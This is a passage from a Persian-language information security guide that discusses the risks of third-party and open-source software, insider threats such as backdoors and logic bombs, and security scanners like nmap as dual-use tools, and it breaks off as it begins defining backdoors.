‫ﻣﻲﻓﺮﻭﺷﻨﺪ ﺩﺍﺭﻧﺪ‪ .‬ﺑﻨﺎﺑﺮﺍﻳﻦ ﺑﻬﺘﺮ ﺍﺳﺖ ﺑﺮﺍﻱ ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﺷﺨﺺ ﺛﺎﻟﺜﻲ ﻛﻪ ﻣﻲﺧﺮﻳﺪ ﻭ ﺭﻭﻱ ﺭﺍﻳﺎﻧﺔ ﺧﻮﺩ ﻧﺼﺐ ﻣﻲﻛﻨﻴﺪ ﺑﺪﻧﺒﺎﻝ ﺗـﻀﻤﻴﻨﻬﺎﻱ‬
‫ﻣﻜﺘﻮﺏ ﺑﺎﺷﻴﺪ‪.‬‬
‫ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﺁﺯﺍﺩ ﻫﻴﭻ ﺍﻳﻤﻦﺗﺮ ﺍﺯ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﺗﺠﺎﺭﻱ ﻧﻴﺴﺘﻨﺪ‪ ،‬ﻫﺮﭼﻨﺪ ﺍﻳﻦ ﻣﺰﻳﺖ ﺭﺍ ﺩﺍﺭﻧﺪ ﻛﻪ ﻣﺘﻦ ﺑﺮﻧﺎﻣﻪ ﺑﺮﺍﻱ ﺧﻮﺍﻧﺪﻥ ﺩﺭ ﺍﺧﺘﻴـﺎﺭ ﺷـﻤﺎ‬
‫ﻗﺮﺍﺭ ﺩﺍﺭﺩ‪ .‬ﺍﻛﺜﺮ ﺍﺑﺰﺍﺭﻫﺎﻱ ﺁﺯﺍﺩ ﻭ ﻣﺘﻦﺑﺎﺯ ﻫﻨﮕﺎﻡ ﺗﻮﻟﻴﺪ ﺑﻪ ﭼﻨﺪ ﻗﺴﻤﺖ ﺗﻘﺴﻴﻢ ﻣﻲﺷﻮﻧﺪ ﻭ ﺗﻮﺳﻂ ﭼﻨﺪﻳﻦ ﺑﺮﻧﺎﻣﻪﻧـﻮﻳﺲ ﻧﻮﺷـﺘﻪ ﻣـﻲﺷـﻮﻧﺪ ﻭ‬
‫ﻻ ﻧﺴﺨﻪﻫﺎﻱ ﺟﺪﻳﺪ ﺍﻳﻦ ﻗﺴﻤﺘﻬﺎ ﺑﺪﻭﻥ ﻧﻈﺎﺭﺕ ﺩﻗﻴﻖ ﺳﺎﻳﺮ ﺍﻋﻀﺎﻱ ﮔﺮﻭﻩ‪ ،‬ﻣﻮﺭﺩ ﭘﺬﻳﺮﺵ ﺁﻧـﺎﻥ ﻗـﺮﺍﺭ ﻣـﻲﮔﻴﺮﻧـﺪ؛ ﻭ ﺩﺭﻧﺘﻴﺠـﻪ ﻳـﻚ‬ ‫ﻣﻌﻤﻮ ﹰ‬
‫ﺑﺮﻧﺎﻣﻪﻧﻮﻳﺲ ﺑﺪﺧﻮﺍﻩ ﻣﻲﺗﻮﺍﻧﺪ ﻳﻚ ﻗﻄﻌﻪﺑﺮﻧﺎﻣﺔ ﻛﻮﭼﻚ ﻣﺨﺮﺏ ﺭﺍ ﺑﺪﻭﻥ ﺍﻳﻨﻜﻪ ﺑﻘﻴﻪ ﻣﺘﻮﺟﻪ ﺷﻮﻧﺪ ﺑﻪ ﺑﺮﻧﺎﻣﻪ ﺍﺿﺎﻓﻪ ﻛﻨﺪ‪ .‬ﻋﻼﻭﻩ ﺑﺮ ﺁﻥ ﺣﺘﻲ‬
‫ﺍﮔﺮ ﻣﺘﻦ ﺑﺮﻧﺎﻣﻪ ﻣﻮﺭﺩ ﺑﺮﺭﺳﻲ ﻗﺮﺍﺭ ﮔﻴﺮﺩ‪ ،‬ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﺮﺧﻲ ﺩﺭﺑﻬﺎﻱ ﻣﺨﻔﻲ ﻭ ﻋﻤﻠﻜﺮﺩﻫﺎﻱ ﻇﺮﻳﻒ ﺁﻥ ﺩﻳﺪﻩ ﻧﺸﻮﻧﺪ ‪ -‬ﺍﻓﺮﺍﺩ ﻛﻤﻲ ﺍﻃـﻼﻉ‬
‫ﺩﺍﺭﻧﺪ ﻛﻪ ﭼﮕﻮﻧﻪ ﻣﻲﺗﻮﺍﻥ ﺑﻪ ﺩﻗﺖ ﻧﺮﻡﺍﻓﺰﺍﺭ ﺭﺍ ﺑﺎﺯﺑﻴﻨﻲ ﻛﺮﺩ ﻭ ﺍﮔﺮ ﻓﺮﺩ ﺑﺎﺯﺑﻴﻦ ﻭﺍﻗﻌﹰﺎ ﻋﻼﻗﻪﻣﻨﺪ ﺑﻪ ﺩﺭﻙ ﻫﻤﺔ ﺍﺟﺰﺍﻱ ﺑﺮﻧﺎﻣـﻪ ﻧﺒﺎﺷـﺪ ﻣﻤﻜـﻦ‬
‫ﺍﺳﺖ ﻣﻮﺭﺩ ﻣﺸﻜﻮﻛﻲ ﭘﻴﺪﺍ ﻧﻜﻨﺪ‪ .‬ﺣﺘﻲ ﻳﻚ ﺑﺎﺯﺑﻴﻨﻲ ﻣﺴﺘﻘﻞ ﻧﻴﺰ ﻣﻤﻜﻦ ﺍﺳﺖ ﻛﺎﻓﻲ ﻧﺒﺎﺷﺪ؛ ﭼﺮﺍﮐﻪ ﺑﺎﺯﺑﻴﻨﻬﺎ ﻣﻤﮑﻦ ﺍﺳﺖ ﺗﺨﺼﺺ ﺍﻳﻨﮑﺎﺭ ﺭﺍ‬
‫ﻧﺪﺍﺷﺘﻪ ﺑﺎﺷﻨﺪ‪ ،‬ﺍﺷﺘﺒﺎﻩ ﻛﻨﻨﺪ‪ ،‬ﻭ ﻳﺎ ﺣﺘﻲ ﺍﻳﻦ ﺍﻣﮑﺎﻥ ﻭﺟﻮﺩ ﺩﺍﺭﺩ ﮐﻪ ﻣﻴﺎﻥ ﺑﺎﺯﺑﻴﻦ ﻭ ﻧﻮﻳﺴﻨﺪﺓ ﺑﺮﻧﺎﻣﻪ‪ ،‬ﺗﺒﺎﻧﻲ ﻭﺟﻮﺩ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ!‬
‫ﺑﺨﺶ ﭘﻨﺠﻢ‬

‫ﻣﺘﺄﺳﻔﺎﻧﻪ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ‪download‬ﺷﺪﻩ ﺁﻧﻘﺪﺭ ﺑﺰﺭﮒ ﻫﺴﺘﻨﺪ ﻛﻪ ﻧﻤﻲﺗﻮﺍﻥ ﺑﻪ ﻳﻚ ﺭﻭﺵ ﻣﻌﻴﻦ ﻫﻤﺔ ﺁﻧﻬﺎ ﺭﺍ ﺧﻮﺍﻧﺪ‪ .‬ﻋـﻼﻭﻩ ﺑـﺮ‬
‫ﺍﻳﻦ ﻫﺮﭼﻨﺪ ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﺯﻳﺎﺩﻱ ﺑﺼﻮﺭﺕ ﻣﺘﻦﺑﺎﺯ ﻗﺎﺑﻞ ‪ download‬ﻫﺴﺘﻨﺪ‪ ،‬ﺍﻣﺎ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﮐﺎﺭﺑﺮﺍﻥ ﻗﻄﻌﻪﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﭘﻴﺶﺗﺮﺟﻤﻪ ﺭﺍ ﺑـﺮﺍﻱ‬
‫‪ download‬ﺍﻧﺘﺨﺎﺏ ﻣﻲﻛﻨﻨﺪ‪ .‬ﻫﻴﭻ ﺭﺍﻫﻲ ﺑﺮﺍﻱ ﺍﻃﻤﻴﻨﺎﻥ ﺍﺯ ﺍﻳﻨﻜﻪ ﺍﻳﻦ ﻓﺎﻳﻠﻬﺎ ﻛﻪ ﺑﻪ ﺯﺑﺎﻥ ﻣﺎﺷﻴﻦ ﺩﺭﺁﻣﺪﻩﺍﻧﺪ ﺍﺯ ﺭﻭﻱ ﻫﻤﺎﻥ ﻣـﺘﻦ ﺑﺮﻧﺎﻣـﺔ‬
‫ﻣﻮﺭﺩ ﺍﺩﻋﺎ ﺗﻮﻟﻴﺪ ﺷﺪﻩﺍﻧﺪ ﻳﺎ ﻧﻪ ﻭﺟﻮﺩ ﻧﺪﺍﺭﺩ‪.‬‬
‫ﺑﻌﻨﻮﺍﻥ ﻳﻚ ﺭﺍﻩ ﺟﺎﻳﮕﺰﻳﻦ ﺑﺮﺍﻱ ﺑﺎﺯﺑﻴﻨﻲ‪ ،‬ﻣﻲﺗﻮﺍﻧﻴﺪ ﺍﺯ ﺑﺮﻧﺎﻣﻪﻫﺎﻳﻲ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻴﺪ ﻛﻪ ﭘﻴﺸﺘﺮ ﺩﻳﮕﺮﺍﻥ ﺑﻪ ﺁﻧﻬﺎ ﺍﻋﺘﻤـﺎﺩ ﻛـﺮﺩﻩﺍﻧـﺪ‪ .‬ﺍﻳـﻦ ﺭﻭﺵ‬
‫ﭼﻨﺪﺍﻥ ﻣﻄﻤﺌﻦ ﻧﻴﺴﺖ‪ ،‬ﭼﻮﻥ ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﺮﻧﺎﻣﻪ ﺩﺍﺭﺍﻱ ﺗﻬﺪﻳﺪﻱ ﺑﺎﺷﺪ ﻛﻪ ﺑﺮﺍﻱ ﺩﻳﮕﺮﺍﻥ ﺍﺗﻔﺎﻕ ﻧﻤﻲﺍﻓﺘﺪ ﻭﻟﻲ ﺑﺮﺍﻱ ﺷﻤﺎ ﺍﺗﻔﺎﻕ ﺑﻴﺎﻓﺘـﺪ؛ ﻳـﺎ‬
‫ﺣﺘﻲ ﺗﻬﺪﻳﺪ ﺑﺮﺍﻱ ﺍﻓﺮﺍﺩ ﺯﻳﺎﺩﻱ ﺍﺗﻔﺎﻕ ﺑﻴﺎﻓﺘﺪ‪ ،‬ﻭﻟﻲ ﻛﺴﻲ ﻣﺘﻮﺟﻪ ﺁﻥ ﻧﺸﻮﺩ‪.‬‬
‫ﻃﺒﻖ ﻳﻚ ﺳﻴﺎﺳﺖ ﻣﻨﺎﺳﺐ‪ ،‬ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﺟﺪﻳﺪ ﺑﺎﻳﺪ ﺍﺑﺘﺪﺍ ﺭﻭﻱ ﺳﻴﺴﺘﻤﻬﺎﻱ ﻏﻴﺮﺣﺴﺎﺱ ﻧﺼﺐ ﻭ ﺁﺯﻣﺎﻳﺶ ﺷﻮﻧﺪ‪ .‬ﺑﺎ ﺍﻳﻨﻜﺎﺭ ﻓﺮﺻﺖ ﻣﻲﻳﺎﺑﻴﺪ‬
‫ﻣﺸﻜﻼﺕ‪ ،‬ﻧﺎﺳﺎﺯﮔﺎﺭﻳﻬﺎ ﻭ ﺭﻓﺘﺎﺭﻫﺎﻱ ﻏﻴﺮﻋﺎﺩﻱ ﻳﻚ ﺑﺮﻧﺎﻣﻪ ﺭﺍ ﺗﺸﺨﻴﺺ ﺩﻫﻴﺪ‪ .‬ﻳﻚ ﻧﺮﻡﺍﻓﺰﺍﺭ ﺟﺪﻳﺪ ﺭﺍ ﺍﺑﺘﺪﺍ ﺭﻭﻱ ﻳﻚ ﺳﻴـﺴﺘﻢ ﺗﻮﻟﻴـﺪ ﭘﻮﻳـﺎ‬
‫ﻧﺼﺐ ﻧﻜﻨﻴﺪ‪ ،‬ﻭ ﺑﻪ ﻫﻴﭽﻮﺟﻪ ﺁﻧﺮﺍ ﺑﺮﺍﻱ ﺑﺎﺭ ﺍﻭﻝ ﺑﺎ ﺩﺳﺘﺮﺳﻲ ﺍﺑﺮﻛﺎﺭﺑﺮ ﻳﺎ ﺭﺍﻫﺒﺮ ﺳﻴﺴﺘﻢ ﺑﻪ ﺍﺟﺮﺍ ﺩﺭ ﻧﻴﺎﻭﺭﻳﺪ‪ ،‬ﻣﮕﺮ ﺍﻳﻨﻜﻪ ﻭﺍﻗﻌـﹰﺎ ﭼـﺎﺭﺓ ﺩﻳﮕـﺮﻱ‬
‫ﻧﺪﺍﺷﺘﻪ ﺑﺎﺷﻴﺪ‪.‬‬
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬ ‫‪٤١٨‬‬

‫ﺍﮔﺮ ﺷﺨﺼﻲ ﺑﺎ ﺩﺍﻧﺶ ﻛﺎﻓﻲ ﺩﺭ ﺩﺍﺧﻞ ﺳﺎﺯﻣﺎﻥ ﺷﻤﺎ ﻗﺼﺪ ﺧﺮﺍﺑﻜﺎﺭﻱ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ ﻣﻲﺗﻮﺍﻧﺪ ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺍﺑﺰﺍﺭﻫﺎﻱ ﻣﺨﺘﻠﻒ ﺩﺭﺑﻬﺎﻱ ﻣﺨﻔﻲ‪،‬‬
‫ﺑﻤﺒﻬﺎﻱ ﻣﻨﻄﻘﻲ‪ ،٣٢٥‬ﻭ ﺍﺳﺒﻬﺎﻱ ﺗﺮﺍﻭﺍ ﺑﻨﻮﻳﺴﺪ ﻭ ﺁﻧﺮﺍ ﻣﺴﺘﻘﻴﻤﹰﺎ ﺭﻭﻱ ﺳﻴﺴﺘﻢ ﻫﺪﻑ ﻧﺼﺐ ﻛﻨﺪ‪ .‬ﻛﺎﺭﺑﺮﺍﻥ ﻭ ﻛﺎﺭﻣﻨﺪﺍﻥ ﺷﻤﺎ ﺗﻬﺪﻳﺪ ﺑﺰﺭﮔﻲ ﺑﺮﺍﻱ‬
‫ﺍﻣﻨﻴﺖ ﺳﻴﺴﺘﻢ ﺷﻤﺎ ﻣﻲﺑﺎﺷﻨﺪ‪ :‬ﺍﻳﻦ ﺍﻓﺮﺍﺩ ﺑﺎ ﺳﻴﺴﺘﻢ ﺁﺷﻨﺎ ﻫﺴﺘﻨﺪ‪ ،‬ﻧﻘﺎﻁ ﺿﻌﻒ ﺁﻧﺮﺍ ﻣﻲﺷﻨﺎﺳﻨﺪ‪ ،‬ﻭ ﺑﺎ ﺳﻴﺴﺘﻤﻬﺎﻱ ﻛﻨﺘﺮﻝ ﻭ ﺑـﺎﺯﺑﻴﻨﻲ ﻣﻮﺟـﻮﺩ‬
‫ﻻ ﺑﺮﺍﻱ ﻧﻮﺷﺘﻦ ﻭ ﻭﺍﺭﺩ ﻛﺮﺩﻥ ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﻣﺨﺮﺏ ﺑﻪ ﺳﻴﺴﺘﻢ ﺍﺯ ﺩﺳﺘﺮﺳﻲ ﻛﺎﻓﻲ ﺑﺮﺧﻮﺭﺩﺍﺭﻧﺪ‪ .‬ﺷـﺎﻳﺪ ﺑـﻪ‬ ‫ﺁﺷﻨﺎﻳﻲ ﺩﺍﺭﻧﺪ‪ .‬ﻛﺎﺭﺑﺮﺍﻥ ﻣﺠﺎﺯ ﻣﻌﻤﻮ ﹰ‬
‫ﻧﻈﺮ ﺧﻨﺪﻩﺩﺍﺭ ﺑﻴﺎﻳﺪ ﻛﻪ ﮔﻔﺘﻪ ﺷﻮﺩ ﺩﺭ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺳﺎﺯﻣﺎﻧﻬﺎ‪ ،‬ﺷﺨﺺ ﻣﺴﺌﻮﻝ ﻛﻨﺘﺮﻝ ﻭ ﺑﺎﺯﺑﻴﻨﻲ ﺍﻣﻨﻴﺖ ﻫﻤﺎﻥ ﮐﺴﻲ ﺍﺳﺖ ﻛـﻪ ﺍﮔـﺮ ﺑﺨﻮﺍﻫـﺪ‬
‫ﻻ ﻫﻴﭽﮕﻮﻧﻪ ﻣﻤﻴـﺰﻱ‬ ‫ﻣﻲﺗﻮﺍﻧﺪ ﺑﺎ ﺍﺟﺮﺍﻱ ﭼﻨﺪ ﺩﺳﺘﻮﺭ‪ ،‬ﺑﻴﺸﺘﺮﻳﻦ ﺧﺴﺎﺭﺗﻬﺎ ﺭﺍ ﺑﻪ ﻛﻞ ﺳﻴﺴﺘﻢ ﻭﺍﺭﺩ ﻛﻨﺪ‪ .‬ﺑﺮﺍﻱ ﻣﺪﻳﺮﺍﻥ ﺍﺭﺷﺪ ﺳﻴﺴﺘﻢ ﻧﻴﺰ ﻣﻌﻤﻮ ﹰ‬
‫ﻳﺎ ﺳﺎﻳﺮ ﺍﻧﻮﺍﻉ ﺑﺮﺭﺳﻴﻬﺎ ﺍﻧﺠﺎﻡ ﻧﻤﻲﮔﻴﺮﺩ‪.‬‬

‫ﺍﺑﺰﺍﺭﻫﺎ ﻭ ﺟﻌﺒﻪﺍﺑﺰﺍﺭﻫﺎﻱ ﺍﻣﻨﻴﺘﻲ‬


‫ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﺯﻳﺎﺩﻱ ﻧﻮﺷﺘﻪ ﺷﺪﻩﺍﻧﺪ ﻛﻪ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺑﻄﻮﺭ ﺧﻮﺩﻛﺎﺭ ﺁﺳﻴﺐﭘﺬﻳﺮﻳﻬﺎﻱ ﺍﻣﻨﻴﺘﻲ ﺭﺍﻳﺎﻧﻪ ﺭﺍ ﻣﺸﺨﺺ ﺳﺎﺯﻧﺪ‪ .‬ﺑﻌﻀﻲ ﺍﺯ ﺍﻳـﻦ ﺑﺮﻧﺎﻣـﻪﻫـﺎ‬
‫ﺭﺍﻳﺎﻧﻪﺍﻱ ﻛﻪ ﺭﻭﻱ ﺁﻥ ﺍﺟﺮﺍ ﺷﻮﻧﺪ ﺭﺍ ﺑـﺪﻧﺒﺎﻝ ﺁﺳـﻴﺐﭘـﺬﻳﺮﻳﻬﺎﻱ ﺳﻴـﺴﺘﻤﻲ ﻛـﺎﻭﺵ ﻣـﻲﻛﻨﻨـﺪ‪ ،‬ﻭ ﺑﺮﺧـﻲ ﺩﻳﮕـﺮ ﺩﺭ ﻳـﻚ ﺷـﺒﻜﻪ ﺑـﺪﻧﺒﺎﻝ‬
‫ﺁﺳﻴﺐﭘﺬﻳﺮﻳﻬﺎﻳﻲ ﻣﻲﮔﺮﺩﻧﺪ ﻛﻪ ﺍﺯ ﺭﺍﻩ ﺩﻭﺭ ﻣﻲﺗﻮﺍﻧﻨﺪ ﻣﻮﺭﺩ ﺑﻬﺮﻩﺑﺮﺩﺍﺭﻱ ﻗﺮﺍﺭ ﮔﻴﺮﻧﺪ‪ .‬ﮔﺎﻩ ﺑﻪ ﺍﻳﻦ ﺑﺮﻧﺎﻣﻪﻫﺎ ﭘﻮﻳﺸﮕﺮﻫﺎﻱ ﺍﻣﻨﻴﺘﻲ‪ ٣٢٦‬ﻭ ﻳﺎ ﺑﻄـﻮﺭ‬
‫ﻛﻠﻲﺗﺮ "ﺍﺑﺰﺍﺭﻫﺎﻱ ﺍﻣﻨﻴﺘﻲ" ﻣﻲﮔﻮﻳﻨﺪ‪.‬‬
‫ﭘﻮﻳﺸﮕﺮﻫﺎ ﻭ ﺳﺎﻳﺮ ﺍﺑﺰﺍﺭﻫﺎﻱ ﺍﻣﻨﻴﺘﻲ ﻣﺜﻞ ﺷﻤﺸﻴﺮ ﺩﻭ ﻟﺒﻪ ﻫﺴﺘﻨﺪ‪ .‬ﺍﺯ ﻳﻚ ﻃﺮﻑ ﺍﻓﺮﺍﺩ ﺣﺮﻓﻪﺍﻱ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺍﺯ ﺁﻧﻬﺎ ﺑﺎ ﻫﺪﻑ ﺍﻣﻦﻛﺮﺩﻥ ﺭﺍﻳﺎﻧﻪﻫﺎ‬
‫ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻨﺪ؛ ﻭ ﺍﺯ ﻃﺮﻑ ﺩﻳﮕﺮ ﻧﻔﻮﺫﮔﺮﻫﺎ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺍﻳﻦ ﺍﺑﺰﺍﺭﻫﺎ ﺭﺍ ﺑﺮﺍﻱ ﻧﻔﻮﺫ ﺑﻪ ﺳﻴﺴﺘﻤﻬﺎ ﺑﻜﺎﺭ ﺑﺮﻧﺪ‪ .‬ﺍﮔﺮ ﺭﺍﻫﺒﺮﺍﻥ ﺑﺘﻮﺍﻧﻨﺪ ﺑـﺎ ﺍﻳـﻦ ﺍﺑﺰﺍﺭﻫـﺎ‬
‫ﺳﺮﻳﻌﹰﺎ ﺳﻴﺴﺘﻤﻬﺎ ﺭﺍ ﺑﺪﻧﺒﺎﻝ ﺁﺳﻴﺐﭘﺬﻳﺮﻳﻬﺎﻱ ﺷﻨﺎﺧﺘﻪﺷﺪﻩ ﭘﻮﻳﺶ ﻛﻨﻨﺪ‪ ،‬ﻓﻬﺮﺳﺘﻲ ﺍﺯ ﺁﺳﻴﺐﭘﺬﻳﺮﻳﻬﺎ ﺑﺪﺳﺖ ﺧﻮﺍﻫﻨـﺪ ﺁﻭﺭﺩ ﻛـﻪ ﻣـﻲﺗﻮﺍﻧﻨـﺪ ﺑـﺎ‬
‫ﺑﺮﻃﺮﻑ ﻛﺮﺩﻥ ﺁﻧﻬﺎ ﺳﻄﺢ ﺍﻣﻨﻴﺖ ﺳﻴﺴﺘﻢ ﺭﺍ ﺍﺭﺗﻘﺎ ﺩﻫﻨﺪ‪ ،‬ﺍﻣﺎ ﻫﻤﻴﻦ ﺍﺑﺰﺍﺭﻫﺎ ﺑﻪ ﺗﺒﻬﻜﺎﺭﺍﻥ ﺷﺨﺼﻲ ﻳﺎ ﺳﺎﺯﻣﺎﻧﻲ ﻧﻴـﺰ ﺭﺍﻫﻬـﺎﻱ ﻣﻤﻜـﻦ ﺑـﺮﺍﻱ‬
‫ﻧﻔﻮﺫ ﺑﻪ ﺳﻴﺴﺘﻤﻬﺎ ﺭﺍ ﻧﺸﺎﻥ ﻣﻲﺩﻫﻨﺪ‪.‬‬
‫ﺑﺮﺧﻲ ﺍﺑﺰﺍﺭﻫﺎﻱ ﺍﻣﻨﻴﺘﻲ ﺑﺮﺍﻱ ﺭﺍﻫﺒﺮﺍﻥ ﺣﺮﻓﻪﺍﻱ ﺍﻣﻨﻴﺖ ﻧﻮﺷﺘﻪ ﺷﺪﻩﺍﻧﺪ‪ ،‬ﻫﺮﭼﻨﺪ ﻣﻬﺎﺟﻤﺎﻥ ﻧﻴﺰ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺍﺯ ﺁﻧﻬﺎ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻨﺪ‪ .‬ﺍﻣﺎ ﺍﺑﺰﺍﺭﻫـﺎﻱ‬
‫ﺑﻴﺸﺘﺮﻱ ﺩﺭ ﺍﻳﻨﺘﺮﻧﺖ ﻭﺟﻮﺩ ﺩﺍﺭﻧﺪ ﻛﻪ ﻣﻨﺤﺼﺮﹰﺍ ﺑﺮﺍﻱ ﻛﺎﺭﺑﺮﺩﻫﺎﻱ ﻣﺨﺮﺏ ﺑﻮﺟﻮﺩ ﺁﻣﺪﻩﺍﻧـﺪ‪ .‬ﺟﺎﻟـﺐ ﺍﻳﻨﺠﺎﺳـﺖ ﻛـﻪ ﻛﻴﻔﻴـﺖ ﺑﻌـﻀﻲ ﺍﺯ ﺍﻳـﻦ‬
‫ﺍﺑﺰﺍﺭﻫﺎﻱ ﻣﺨﺮﺏ ﺑﺴﻴﺎﺭ ﺑﺎﻻﺳﺖ؛ ﺁﻧﻘﺪﺭ ﺑﺎﻻ ﻛﻪ ﺭﺍﻫﺒﺮﺍﻥ ﺣﺮﻓﻪﺍﻱ ﻧﻴﺰ ﺑﺮﺍﻱ ﺗﺄﻣﻴﻦ ﺍﻣﻨﻴﺖ ﺍﺯ ﺁﻧﻬﺎ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﻨﺪ‪ .‬ﺍﺑﺰﺍﺭ ‪ nmap‬ﻣﺜـﺎﻟﻲ ﺍﺯ‬
‫ﺍﻳﻦ ﺍﺑﺰﺍﺭﻫﺎﺳﺖ ﻛﻪ ﺩﺭ ﺟﻮﺍﻣﻊ ﻣﺠﺮﻣﺎﻧﺔ ﺭﺍﻳﺎﻧﻪﺍﻱ ﺑﺮﺍﻱ ﻧﮕﺎﺷﺖ ﺷﺒﻜﻪﺍﻱ ﻧﻮﺷﺘﻪﺷﺪﻩ ﻭ ﻫﻢﺍﻛﻨﻮﻥ ﺑﻄﻮﺭ ﻭﺳـﻴﻌﻲ ﻣـﻮﺭﺩ ﺍﺳـﺘﻔﺎﺩﺓ ﺭﺍﻫﺒـﺮﺍﻥ‬
‫ﺣﺮﻓﻪﺍﻱ ﺍﻣﻨﻴﺖ ﺷﺒﻜﻪﻫﺎ ﻗﺮﺍﺭ ﺩﺍﺭﺩ‪.‬‬
‫ﺑﺪﻟﻴﻞ ﺩﺭ ﺩﺳﺘﺮﺱ ﺑﻮﺩﻥ ﺍﺑﺰﺍﺭﻫﺎﻱ ﺍﻣﻨﻴﺘﻲ ﺑﺎ ﻛﻴﻔﻴﺖ ﺑﺮﺍﻱ ﺣﻤﻠﻪ‪ ،‬ﺑﺎﻳﺪ ﻣﺮﺍﻗﺐ ﺁﺳﻴﺐﭘﺬﻳﺮﻳﻬﺎﻱ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺧﻮﺩ ﺑﺎﺷـﻴﺪ ﻭ ﻣﺮﺗﺒـﹰﺎ ﺑـﺮ ﺁﻧﻬـﺎ‬
‫ﻧﻈﺎﺭﺕ ﻭ ﺍﺯ ﺁﻧﻬﺎ ﻣﺤﺎﻓﻈﺖ ﻛﻨﻴﺪ‪ .‬ﺍﻳﻨﻜﻪ ﺧﻮﺩﺗﺎﻥ ﺍﻳﻦ ﺍﺑﺰﺍﺭﻫﺎ ﺭﺍ ﺑﺪﺳﺖ ﺁﻭﺭﺩﻩ ﻭ ﺍﺟﺮﺍ ﻛﻨﻴﺪ ﺍﺯ ﻣﺰﺍﻳﺎﻳﻲ ﺑﺮﺧﻮﺭﺩﺍﺭ ﺍﺳﺖ‪ ،‬ﻭﻟﻲ ﺧﻄﺮﺍﺗﻲ ﻧﻴـﺰ ﺩﺭ‬
‫ﭘﻲ ﺩﺍﺭﺩ‪ .‬ﺑﺮﺧﻲ ﺍﺑﺰﺍﺭﻫﺎ ﺑﺎ ﻣﻼﺣﻈﺎﺕ ﺭﺍﻫﺒﺮﻱ ﺍﻣﻨﻴﺖ ﻭ ﻗﺎﺑﻞ ﺍﻧﺘﻘﺎﻝ ﺑﻮﺩﻥ ﻧﻮﺷﺘﻪ ﻧﺸﺪﻩﺍﻧﺪ ﻭ ﻣﻤﻜﻦ ﺍﺳﺖ ﺑـﻪ ﺳﻴـﺴﺘﻢ ﺻـﺪﻣﻪ ﻭﺍﺭﺩ ﻛﻨﻨـﺪ‪.‬‬
‫ﺑﺮﺧﻲ ﺍﺑﺰﺍﺭﻫﺎﻱ ﺩﻳﮕﺮ ﻣﻤﻜﻦ ﺍﺳﺖ ﺗﻠﻪﺍﻱ ﺑﺎﺷﻨﺪ ﺑﺮﺍﻱ ﺧﺮﺍﺑﻜﺎﺭﻱ ﻣﺨﻔﻴﺎﻧﻪ ﺩﺭ ﺳﻴﺴﺘﻢ‪ ،‬ﺩﺭﺣﺎﻟﻴﻜﻪ ﺷﻤﺎ ﻓﻜـﺮ ﻣـﻲﻛﻨﻴـﺪ ﺩﺭﺣـﺎﻝ ﺟـﺴﺘﺠﻮ‬
‫ﺑﺪﻧﺒﺎﻝ ﻣﺸﻜﻼﺕ ﻫﺴﺘﻴﺪ‪ .‬ﺩﺭ ﺍﺟﺮﺍﻱ ﭘﻮﻳﺸﮕﺮﻫﺎﻱ ﺍﻣﻨﻴﺘﻲ ﻋﺠﻠﻪ ﻧﻜﻨﻴﺪ‪ ،‬ﻣﮕﺮ ﺍﻳﻨﻜﻪ ﺩﻗﻴﻘﹰﺎ ﺑﺪﺍﻧﻴﺪ ﺁﻧﻬﺎ ﭼﻪ ﻣﻲﻛﻨﻨﺪ ﻭ ﭼﮕﻮﻧﻪ ﻣـﻲﺗﻮﺍﻧﻨـﺪ ﺑـﻪ‬
‫ﺷﻤﺎ ﺩﺭ ﺍﻳﻤﻦ ﻛﺮﺩﻥ ﺳﻴﺴﺘﻤﻬﺎ ﻛﻤﻚ ﻧﻤﺎﻳﻨﺪ‪.‬‬

‫ﺩﺭﺑﻬﺎﻱ ﻣﺨﻔﻲ ﻭ ﺗﻠﻪﻫﺎ‬


‫ﺩﺭﺑﻬﺎﻱ ﻣﺨﻔﻲ ﻛﻪ ﺑﻪ ﺁﻧﻬﺎ ﺗﻠﻪ ﻧﻴﺰ ﻣﻲﮔﻮﻳﻨﺪ‪ ،‬ﻗﻄﻌﻪﺑﺮﻧﺎﻣﻪﻫﺎﻳﻲ ﻫﺴﺘﻨﺪ ﻛﻪ ﺩﺭﻭﻥ ﺑﺮﻧﺎﻣﻪﻫﺎ ﻳﺎ ﺳﻴـﺴﺘﻢﻋﺎﻣﻠﻬـﺎ ﻗـﺮﺍﺭ ﺩﺍﺩﻩ ﻣـﻲﺷـﻮﻧﺪ ﻭ ﺑـﻪ‬
